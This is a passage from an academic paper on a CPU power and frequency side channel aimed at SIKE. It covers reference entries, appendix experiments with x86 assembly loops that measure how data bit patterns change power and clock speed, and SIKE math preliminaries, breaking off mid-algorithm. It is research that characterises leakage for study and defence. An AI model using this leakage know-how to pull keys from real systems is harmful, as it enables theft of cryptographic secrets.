   against side channel attacks. In CAV, 2014.

   [28] Armando Faz-Hernández and Kris Kwiatkowski. Introducing CIRCL:

   An Advanced Cryptographic Library. Cloudflare, 2019. https://gi

   thub.com/cloudflare/circl. Accessed on Jun 7, 2022.

   [29] Armando Faz-Hernández, Julio López, Eduardo Ochoa-Jiménez, and

   Francisco Rodríguez-Henríquez. A faster software implementation of

   the supersingular isogeny Diffie-Hellman key exchange protocol. IEEE

   Transactions on Computers, 67(11), 2018.

   [30] Pierre-Alain Fouque and Frédéric Valette. The doubling attack–why

   upwards is better than downwards. In CHES, 2003.

   [31] Eiichiro Fujisaki and Tatsuaki Okamoto. Secure integration of
   asym-

   metric and symmetric encryption schemes. Journal of Cryptology,

   26(1), 2013.

   [32] Steven D. Galbraith, Christophe Petit, Barak Shani, and Yan Bo Ti.
   On

   the security of supersingular isogeny cryptosystems. In ASIACRYPT,

   2016.

   [33] Si Gao, Johann Großschädl, Ben Marshall, Dan Page, Thinh Pham,

   and Francesco Regazzoni. An instruction set extension to support

   software-based masking. Cryptology ePrint Archive, Report 2020/773,

   2020.

   [34] Si Gao, Ben Marshall, Dan Page, and Elisabeth Oswald.
   Share-slicing:

   Friend or foe? TCHES, 2020.

   [35] Daniel Genkin, Lev Pachmanov, Itamar Pipman, Eran Tromer, and

   Yuval Yarom. ECDSA key extraction from mobile devices via nonin-

   trusive physical side channels. In CCS, 2016.

   [36] Daniel Genkin, Itamar Pipman, and Eran Tromer. Get your hands off

   my laptop: Physical side-channel key-extraction attacks on PCs. In

   CHES, 2014.

   [37] Enes Göktas, Kaveh Razavi, Georgios Portokalidis, Herbert Bos, and

   Cristiano Giuffrida. Speculative probing: Hacking blind in the Spectre

   era. In CCS, 2020.

   [38] Jovan D Golic and Christophe Tymen. Multiplicative masking and ´

   power analysis of AES. In CHES, 2002.

   [39] Louis Goubin and Jacques Patarin. DES and differential power
   analysis

   the “duplication” method. In CHES, 1999.

   [40] Corey Gough, Ian Steiner, and Winston Saunders. Energy Efficient

   Servers: Blueprints for Data Center Optimization. Apress, 2015.

   [41] Hannes Groß, Manuel Jelinek, Stefan Mangard, Thomas Unterluggauer,

   and Mario Werner. Concealing secrets in embedded processors designs.

   In CARDIS, 2016.

   [42] Hannes Groß, Stefan Mangard, and Thomas Korak. Domain-oriented

   masking: Compact masked hardware implementations with arbitrary

   protection order. In TIS, 2016.

   [43] Daniel Gruss, Clémentine Maurice, Anders Fogh, Moritz Lipp, and

   Stefan Mangard. Prefetch side-channel attacks: Bypassing SMAP and

   kernel ASLR. In CCS, 2016.

   [44] Dennis Hofheinz, Kathrin Hövelmanns, and Eike Kiltz. A modular

   analysis of the Fujisaki-Okamoto transformation. In TCC, 2017.

   [45] Ralf Hund, Carsten Willems, and Thorsten Holz. Practical timing
   side

   channel attacks against kernel space ASLR. In S&P, 2013.

   [46] Intel. Running average power limit energy reporting /
   cve-2020-8694 ,

   cve-2020-8695 / intel-sa-00389. https://www.intel.com/conten

   t/www/us/en/developer/articles/technical/software-secu

   rity-guidance/advisory-guidance/running-average-power-

   limit-energy-reporting.html. Accessed on Jun 7, 2021.

   [47] Intel. Thermal design power (TDP) in Intel processors.
   https://www.

   intel.com/content/www/us/en/support/articles/000055611

   /processors.html. Accessed on Jun 7, 2022.

   [48] Intel. Intel 64 and IA-32 Architectures Optimization Reference
   Manual,

   June 2021.

   [49] Intel. Intel 64 and IA-32 Architectures Software Developer’s
   Manual,

   June 2021.

   [50] Intel. Power management - technology overview. https://builders

   .intel.com/docs/networkbuilders/power-management-techn

   ology-overview-technology-guide.pdf, 2021. Accessed on Jun

   7, 2022.

   [51] Yeongjin Jang, Sangho Lee, and Taesoo Kim. Breaking kernel address

   space layout randomization with Intel TSX. In CCS, 2016.

   [52] David Jao, Reza Azarderakhsh, Matthew Campagna, Craig Costello,

   Luca De Feo, Basil Hess, Amir Jalali, Brian Koziel, Brian LaMacchia,

   Patrick Longa, Michael Naehrig, Joost Renes, Vladimir Soukharev,

   David Urbanik, Geovandro Pereira, Koray Karabina, and Aaron

   Hutchinson. SIKE. Technical report, National Institute of Standards

   and Technology, 2020.

   [53] David Jao and Luca De Feo. Towards quantum-resistant cryptosystems

   from supersingular elliptic curve isogenies. In PQCrypto, 2011.

   [54] Marc Joye and Christophe Tymen. Protections against differential

   analysis for elliptic curve cryptography. In CHES, 2001.

   [55] Manuel Kalmbach, Mathias Gottschlag, Tim Schmidt, and Frank Bel-

   losa. TurboCC: A practical frequency-based covert channel with Intel

   Turbo Boost. Preprint, arXiv:2007.07046 [cs.CR], 2020.

   [56] Nikolaos Kavvadias, Periklis Neofotistos, Spiridon Nikolaidis, CA
   Kos-

   matopoulos, and Theodore Laopoulos. Measurements analysis of the

   software-related power consumption in microprocessors. IEEE Trans-

   actions on Instrumentation and Measurement, 53(4), 2004.

   [57] Colin Ian King. stress-ng. https://github.com/ColinIanKing/

   stress-ng, 2022. Accessed on Jun 7, 2022.

   [58] Paul Kocher. Timing attacks on implementations of Diffie-Hellman,

   RSA, DSS, and other systems. In CRYPTO, 1996.

   [59] Paul Kocher, Joshua Jaffe, and Benjamin Jun. Differential power
   anal-

   ysis. In CRYPTO, 1999.

   [60] Yann Le Corre, Johann Großschädl, and Daniel Dinu. Micro-

   architectural power simulator for leakage assessment of cryptographic

   software on ARM Cortex-M3 processors. In COSADE, 2018.

   [61] Sheayun Lee, Andreas Ermedahl, Sang Lyul Min, and Naehyuck Chang.

   An accurate instruction-level energy consumption model for embedded

   RISC processors. ACM SIGPLAN Notices, 36(8), 2001.

   [62] Linux. aperfmperf.c. https://git.kernel.org/pub/scm/lin

   ux/kernel/git/torvalds/linux.git/tree/arch/x86/kernel/

   cpu/aperfmperf.c. Accessed on Jun 7, 2022.

   [63] Moritz Lipp, Daniel Gruss, and Michael Schwarz. AMD prefetch

   attacks through power and time. In USENIX Security, 2022.

   [64] Moritz Lipp, Andreas Kogler, David Oswald, Michael Schwarz,
   Cather-

   ine Easdon, Claudio Canella, and Daniel Gruss. PLATYPUS: Software-

   based power side-channel attacks on x86. In S&P, 2021.

   [65] Chen Liu, Abhishek Chakraborty, Nikhil Chawla, and Neer Roggel.

   Frequency throttling side-channel attack. Preprint, arXiv:2206.07012

   [cs.CR], 2022.

   [66] Patrick Longa. Post-quantum Cryptography. Microsoft, 2019. Avail-

   able at https://github.com/microsoft/PQCrypto-SIDH. Ac-

   cessed on Jun 7, 2022.

   [67] Stefan Mangard. A simple power-analysis (SPA) attack on implemen-

   tations of the AES key expansion. In ICISC, 2002.

   [68] Stefan Mangard, Elisabeth Oswald, and Thomas Popp. Power Analysis

   Attacks: Revealing the Secrets of Smart Cards, volume 31. Springer

   Science & Business Media, 2008.

   [69] Stefan Mangard, Norbert Pramstaller, and Elisabeth Oswald.
   Success-

   fully attacking masked AES hardware implementations. In CHES,

   2005.

   [70] Heiko Mantel, Johannes Schickel, Alexandra Weber, and Friedrich

   Weber. How secure is green IT? the case of software-based energy side

   channels. In ESORICS, 2018.

   [71] Rita Mayer-Sommer. Smartly analyzing the simplicity and the power

   of simple power analysis on smartcards. In CHES, 2000.

   [72] David McCann, Elisabeth Oswald, and Carolyn Whitnall. Towards

   practical tools for side channel aware software engineering:’grey

   box’modelling for instruction leakages. In USENIX Security, 2017.

   [73] Thomas Messerges. Using second-order power analysis to attack DPA

   resistant software. In CHES, 2000.

   [74] Thomas Messerges, Ezzy Dabbish, and Robert Sloan. Investigations
   of

   power analysis attacks on smartcards. In USENIX Smartcard, 1999.

   [75] Thomas Messerges, Ezzy Dabbish, and Robert Sloan. Power analysis

   attacks of modular exponentiation in smartcards. In CHES, 1999.

   [76] Yan Michalevsky, Aaron Schulman, Gunaa Arumugam Veerapandian,

   Dan Boneh, and Gabi Nakibly. PowerSpy: Location tracking using

   mobile device power analysis. In USENIX Security, 2015.

   [77] Jeremy Morse, Steve Kerrison, and Kerstin Eder. On the limitations
   of

   analyzing worst-case dynamic energy of processing. ACM Transactions

   on Embedded Computing Systems (TECS), 17(3):1–22, 2018.

   [78] Hassan Mujtaba. [IDF15]Intel’s 6th gen Skylake unwrapped - CPU

   microarchitecture, Gen9 graphics core and Speed Shift hardware P-

   state. https://wccftech.com/idf15-intel-skylake-analysis-

   cpu-gpu-microarchitecture-ddr4-memory-impact/4/, 2015.

   Accessed on Jun 7, 2022.

   [79] Svetla Nikova, Christian Rechberger, and Vincent Rijmen. Threshold

   implementations against side-channel attacks and glitches. In ICICS,

   2006.

   [80] Roman Novak. SPA-based adaptive chosen-ciphertext attack on RSA

   implementation. In PKC, 2002.

   [81] Kostas Papagiannopoulos and Nikita Veshchikov. Mind the gap: To-

   wards secure 1st-order masking in software. In COSADE, 2017.

   [82] Matthieu Rivain and Emmanuel Prouff. Provably secure higher-order

   masking of AES. In CHES, 2010.

   [83] Erkay Savas and Çetin Kaya Koç. Montgomery inversion. J. Cryptogr.

   Eng., 8(3), 2018.

   [84] Werner Schindler and Andreas Wiemers. Power attacks in the
   presence

   of exponent blinding. J. Cryptogr. Eng., 4(4), 2014.

   [85] Werner Schindler and Andreas Wiemers. Generic power attacks on

   RSA with CRT and exponent blinding: new results. J. Cryptogr. Eng.,

   7(4), 2017.

   [86] Kai Schramm and Christof Paar. Higher order masking of the AES. In

   CT-RSA, 2006.

   [87] Madura A Shelton, Niels Samwel, Lejla Batina, Francesco Regazzoni,

   Markus Wagner, and Yuval Yarom. Rosita: Towards automatic elimina-

   tion of power-analysis leakage in ciphers. NDSS, 2021.

   [88] Ankush Varma, Eric Debes, Igor Kozintsev, and Bruce Jacob.

   Instruction-level power dissipation in the Intel XScale embedded mi-

   croprocessor. In Embedded Processors for Multimedia and Communi-

   cations II, 2005.

   [89] Nikita Veshchikov. SILK: high level of abstraction leakage
   simulator

   for side channel analysis. In PPREW, 2014.

   [90] Vince Weaver. Reading RAPL energy measurements from linux. http:

   //web.eece.maine.edu/~vweaver/projects/rapl/. Accessed

   on Jun 7, 2022.

   [91] Rafael J. Wysocki. intel_pstate CPU performance scaling driver.

   https://www.kernel.org/doc/html/v4.19/admin-guide/pm/i

   ntel_pstate.html. Accessed on Jun 7, 2022.

   [92] Lin Yan, Yao Guo, Xiangqun Chen, and Hong Mei. A study on power

   side channels on mobile devices. In Internetware, 2015.

   [93] Qing Yang, Paolo Gasti, Gang Zhou, Aydin Farajidavar, and Kiran

   Balagani. On inferring browsing activity on smartphones via USB

   power analysis side-channel. IEEE Trans. Inf. Forensics Secur., 12(5),

   2016.

   [94] Sung-Ming Yen, Wei-Chih Lien, SangJae Moon, and JaeCheol Ha.

   Power analysis by exploiting chosen message and internal collisions -

   vulnerability of checking mechanism for RSA-decryption. In Mycrypt,

   2005.

   [95] Zhenkai Zhang, Sisheng Liang, Fan Yao, and Xing Gao. Red alert

   for power leakage: Exploiting Intel RAPL-induced side channels. In

   ASIACCS, 2021.

   A Appendix

   A.1 Leakage Model—Additional Experiments

   HD in the ALU Input In Section 4.1, we saw that increas-

   ing the number of bit transitions in the ALU output causes an

   increase in power consumption and a decrease in frequency.

   Here, we set out to understand if the same effect happens when

   bit transitions occur in the ALU input. We need a sender that

   offers fine-grained control over the number of transitions in

   the ALU input, while avoiding potential side-effects such as

   the HW effect or bit transitions in the ALU output.

   We design a sender that is symmetric to the one of Figure 3a.

   Our sender still uses shlx and shrx instructions, as shown

   in Figure 13a. However, it is designed such that the output

   of all shlx and shrx instructions is always the same, and

   only their input varies as a function of COUNT. Hence, any

   HD effect is caused by bit transitions on the ALU input only.

   For example, when COUNT = 8, the source register to each

   shlx contains 0x000000ffffffff00, and the source register

   to each shrx contains 0x00ffffffff000000, the alternation

   of which translates to a HD of 4×8 in the ALU input.

   Figure 14 shows the results for increasing COUNT values.

   We see that the power consumption grows and the frequency

   drops when COUNT grows, confirming that the number of

   bit transitions (i.e., the HD) in the ALU input directly affects

   power consumption and CPU frequency. We also see that the

   changes in power / frequency become more significant when

   rax = COUNT

   rbx = 0x0000FFFFFFFF0000 >> COUNT

   rcx = 0x0000FFFFFFFF0000 << COUNT

   loop:

    shlx %rax,%rbx,%rdx // rdx = rbx << rax

    shlx %rax,%rbx,%rsi // rsi = rbx << rax

    shrx %rax,%rcx,%rdi // rdi = rcx >> rax

    shrx %rax,%rcx,%r8 // r8 = rcx >> rax

    shlx %rax,%rbx,%r9 // r9 = rbx << rax

    shlx %rax,%rbx,%r10 // r10 = rbx << rax

    shrx %rax,%rcx,%r11 // r11 = rcx >> rax

    shrx %rax,%rcx,%r12 // r12 = rcx >> rax

   jmp loop

   (a) Variant of sender for the HD experiments.

   rax = 1

   rsp = pointer_to_memory

   rbx = … = r15 = INPUT

   loop:

    mov %rax,(%rsp) // store rax to memory

    mov %rax,(%rsp) // store rax to memory

    mov %rax,(%rsp) // store rax to memory

    mov %rax,(%rsp) // store rax to memory

    mov %rax,(%rsp) // store rax to memory

    mov %rax,(%rsp) // store rax to memory

    mov %rax,(%rsp) // store rax to memory

    mov %rax,(%rsp) // store rax to memory

   jmp loop

   (b) Sender for the HW at rest experiments.

   Figure 13: Additional sets of instructions (senders) used to reverse
   engineer the dependency between data and power consumption

   / frequency on our CPUs. Different senders are designed to target
   different effects. Each sender can be run with variable inputs.

   0 5 10 15

   COUNT

   4.275

   4.280

   4.285

   4.290

   4.295

   Frequency (GHz)

   (a) Mean frequencies.

   0 5 10 15

   COUNT

   22.8

   22.9

   23.0

   23.1

   Power (W)

   (b) Mean power consumptions.

   Figure 14: Effect of increasing COUNT in Figure 13a’s sender

   on our i7-9700 CPU. Higher COUNT values cause higher HDs

   in the ALU output. As the HD increases, the mean power con-

   sumption grows and the mean steady-state frequency drops.

   the COUNT > 8, as a result of the non-uniform HW cost of

   having 1s closer to the MSB in the fixed source register rcx.

   Non-uniform HW In Section 4.2, we saw that the HW ef-

   fect it depends on the position of 1s in the data (i.e., it is

   non-uniform). We now discuss two experiments that provide

   additional evidence that the HW effect is non-uniform. We

   refer to these experiments as shift0

   and shift1

   . Both experi-

   ments use the same sender of Section 4.2, shown in Figure 3b.

   In shift1

   , we fix the number of consecutive 1s and measure

   the impact of changing the position of these consecutive 1s

   in the LEFT = RIGHT input, when all surrounding bits are

   0s. In shift0

   , we do the opposite: we fix the number of con-

   secutive 0s and measure the impact of changing the position

   of these consecutive 0s in the LEFT = RIGHT input, when

   all surrounding bits are 1s. By construction, since the HW is

   fixed and the sender does not introduce any HD effect, any

   differences in the results depend only on the position of 1s.

   We label different positions of the consecutive bit patterns

   based on their “shift offset” starting from the LSB. For exam-

   ple, when the number of consecutive 1s in shift1

   is 32, a shift

   offset of 0 refers to input value 0x00000000ffffffff and a

   shift offset of 16 refers to input value 0x0000ffffffff0000.

   20 40 60

   Shift Offset

   4.12

   4.13

   4.14

   4.15

   Frequency (GHz)

   8 ones

   16 ones

   32 ones

   48 ones

   (a) Frequency vs shift offset

   20 40 60

   Shift Offset

   26.4

   26.6

   26.8

   27.0

   27.2

   Power (W)

   8 ones

   16 ones

   32 ones

   48 ones

   (b) Power vs shift offset

   Figure 15: Effect of shifting consecutive 1s in the LEFT =

   RIGHT input to Figure 3b’s sender on our i7-9700 CPU. As

   we shift the 1s towards the MSB, the mean power consump-

   tion grows and the mean steady-state frequency drops.

   Similarly, when the number of consecutive 0s in shift0

   is 32, a

   shift offset of 16 refers to input value 0xffff00000000ffff.

   Figure 15 shows the results for the shift1

   experiment when

   we fix the number of 1s to 8, 16, 32, or 48. Consider the

   case when the number of 1s is 16. When the shift offset is

   between 0 to 16, we see almost no variation in the mean power

   / frequency. This is because as we shift in this range, 1s are

   still all the low 32 bits, and we know from Figure 7 that there

   is little difference in the HW effect for 1s that are in the low

   32 bits. However, when the shift offset increases from 16 to

   48, the power consumption grows and the frequency drops.

   This is because we start gaining 1s in the high 32 bits and

   approaching the MSB. This is consistent with what we saw

   in Figure 7, where 1s closer to the MSB have a stronger HW

   effect than 1s closer to the 32nd bit. The results are similar

   when the number of 1s is 8. When the number of 1s is 32 or 48,

   the HW effect increases every time the shift offset increases.

   This is because, in these cases, shifting means that we lose 1s

   in the low 32 bits and gain 1s in the high 32 bits, and we know

   from Figure 7 that 1s in the high 32 bits have a stronger HW

   effect than 1s in the low 32 bits. The HW increments in these

   cases are also more significant, because the delta between the

   HW effect of the bits we gain and the bits we lose is larger.

   20 40 60

   Shift Offset

   4.12

   4.13

   4.14

   4.15

   Frequency (GHz)

   8 zeros

   16 zeros

   32 zeros

   48 zeros

   (a) Frequency vs shift offset

   20 40 60

   Shift Offset

   26.6

   26.8

   27.0

   27.2

   Power (W)

   8 zeros

   16 zeros

   32 zeros

   48 zeros

   (b) Power vs shift offset

   Figure 16: Effect of shifting consecutive 0s in the LEFT =

   RIGHT input to Figure 3b’s sender on our i7-9700 CPU. As

   we shift the 0s towards the MSB, the mean power consump-

   tion drops and the mean steady-state frequency grows.

   Figure 16 shows the results for the shift0

   experiment. These

   results are symmetrical to the shift1 ones and can be explained

   by the same reasons described for the shift1

   experiment.

   In summary, the shift0

   and shift1

   experiments support our

   observation that the HW effect is non-uniform.

   HW Root Cause In Section 4.3, we saw that the HD effect

   and the HW effect are additive. Recall that the HD effect

   is due to 1 → 0 and 0 → 1 bit transitions in the data being

   processed. This is a well-understood effect in the literature,

   and can be attributed to the fact that when more bits flip during

   a computation, more transistors are switched in the datapath,

   which causes dynamic power consumption to grow [46, 68].

   However, it is difficult to pinpoint the root cause of the HW

   effect on x86 Intel CPUs. For example, it is unclear if the HW

   effect occurs only when data is actively computed on, or if it

   is due to any data-dependent power cost of simply keeping

   data stored inside registers. Our sender from Figure 3b cannot

   distinguish between these two cases because it is designed to

   continuously compute on and overwrite identical data values.

   Here, we design a new sender to test if the HW effect occurs

   also when data values with different HWs are simply stored

   into registers (at rest), but not actively computed on.

   Our sender, shown in Figure 13b, is designed as follows.

   First, it sets the content of rax to 1, rsp to a memory location,

   and all other architectural registers to a fixed INPUT value.

   Then, it enters an infinite loop of stores that write the content

   of rax into the memory location pointed to by rsp.

   13

   By construction, the store operations in the loop are always

   the same and independent of the value of INPUT. Changing

   the value of INPUT only affects the content of registers that

   are initialized, but not actively computed on by the sender.

   Any difference in power consumption due to different INPUT

   values would then be due to HW effect at rest.

   Figure 17 shows the results when we increase the HW of

   INPUT from 0 to 64. We see no differences in the mean power

   consumption and mean steady-state frequency when the HW

   13We use a store so that the register file is constantly being read
   from, in

   the offchance an inactive register file could be powered down.

   0 20 40 60

   HW of INPUT

   4.33

   4.34

   4.35

   4.36

   4.37

   Frequency (GHz)

   (a) Frequency vs HW

   0 20 40 60

   HW of INPUT

   21.2

   21.4

   21.6

   21.8

   22.0

   Power (W)

   (b) Power vs HW

   Figure 17: Effect of increasing the HW of INPUT (at rest)

   in Figure 13b’s sender on our i7-9700 CPU. As we increase

   HW from 0 to 64, the mean power consumption and the mean

   steady-state frequency do not change.

   grows. This result suggests that the HW effect does not occur

   when simply keeping data stored inside registers.

   A.2 Mathematical Preliminaries for SIKE

   SIKE is an isogeny-based key encapsulation method which in-

   volves arithmetic operations of elliptic curves over finite fields.

   In particular, SIKE uses Montgomery elliptic curves. Its se-

   curity relies on the hardness of finding a specific isogeny be-

   tween two such elliptic curves. Here, we provide an overview

   of the details of SIKE that are relevant to our attack.14

   Let p be a prime of the form 2

   e2 3

   e3 − 1. SIKE works in

   the field Fp

   2 = Fp(i) with i

   2 = −1 (mod p) and uses the su-

   persingular elliptic curves over Fp

   2 that have (2

   e2 3

   e3 )

   2 points.

   The set of points P ∈ E(Fp) that satisfy [n]P = O is called

   the n-torsion of E. The curves of interest were chosen so that

   the entire (2

   e2 3

   e3 )-torsion is already defined over Fp

   2 , and

   we have E[2

   e2 3

   e3 ] ∼= Z/(2

   e2 3

   e3 )Z×Z/(2

   e2 3

   e3 )Z; as a result,

   for each curve of interest, E[2

   e2 ] can be generated by linear

   combinations of two points P2 and Q2 with coefficients in Fp

   2 ;

   and likewise E[3

   e3 ] can be generated by linear combinations

   of two points P3 and Q3 with coefficients in Fp

   2 .

   An isogeny 𝜙: E1(Fp

   2 ) → E2(Fp

   2 ) is a group homomor-

   phism from E1(Fp

   2 ) to E2(Fp

   2 ) and a non-constant rational

   map defined over Fp

   2 that preserves the point at infinity O.

   The kernel of an isogeny is ker𝜙 = {P ∈ E1 : 𝜙(P) = O}.

   Every finite subgroup H of a curve E(Fp

   2 ) defines an

   isogeny 𝜙: E → E/H, unique up to isomorphism, such that

   ker𝜙 = H. The cardinality of H is also the degree of the ra-

   tional map 𝜙. Given H, Vélu’s algorithm allows the rational

   map for the isogeny corresponding to H to be computed; the

   computation is tractable when |H| is small.

   An `-isogeny is defined as 𝜙`

   : E → E/hPi, where P has

   exact order `. The order of 𝜙(Q) in E/hPi is the same as

   the order of Q in E unless Q lies above ker𝜙 (meaning that

   14For more information on SIKE, we refer to the SIKE tutorial by

   Costello [19] and to the SIKE specification [52]. For more information
   on

   elliptic curves and isogenies, we refer to the pairings tutorial by
   Costello [18]

   and to De Feo’s lecture notes [23] and habilitation thesis [24]. For
   more

   information on Montgomery ladders, we refer to Bernstein and Lange [6].

   Algorithm 2: Computing and evaluating a 3

   e

   -isogeny,

   simple version ( [52], Appendix A)

   1 function 3_e_iso

   Static parameters: Integer e3 from the public

   parameters

   Input: Constants (A

   +

   24 : A

   −

   24) corresponding to a

   curve EA/C, (XS : ZS) where S has exact

   order 3e3 on EA/C

   Output: (A

   +

   24

   0

   : A

   −

   24

   0

   ) coresponding to the curve

   EA0/C0 = E/hSi

   1 for e = e3 −1 downto 0 by −1 do

   2 (XT : ZT ) ← xTPLe